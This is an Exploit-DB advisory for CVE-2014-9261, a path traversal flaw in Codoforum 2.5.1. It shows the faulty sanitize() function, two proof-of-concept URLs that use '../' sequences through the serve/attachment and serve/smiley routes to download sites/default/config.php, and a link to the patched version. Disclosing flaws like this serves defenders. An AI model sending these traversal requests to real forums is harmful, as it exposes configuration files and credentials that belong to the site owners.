CodoForum 2.5.1 - Arbitrary File Download

EDB-ID:

36320

CVE:

2014-9261

EDB Verified:

Author:

Kacper Szurek

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-03-10

Vulnerable App: 
# Exploit Title: Codoforum 2.5.1 Arbitrary File Download
# Date: 23-11-2014
# Software Link: https://codoforum.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9261

1. Description
  
str_replace() is used to sanitize file path but function output is not assigned to variable

private function sanitize($name) {

    str_replace("..", "", $name);
    str_replace("%2e%2e", "", $name);

    return $name;
}

http://security.szurek.pl/codoforum-251-arbitrary-file-download.html

2. Proof of Concept

http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php

3. Solution:
  
Use patch:

https://codoforum.com/upgrades/codoforum.v.2.6.up.zip
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services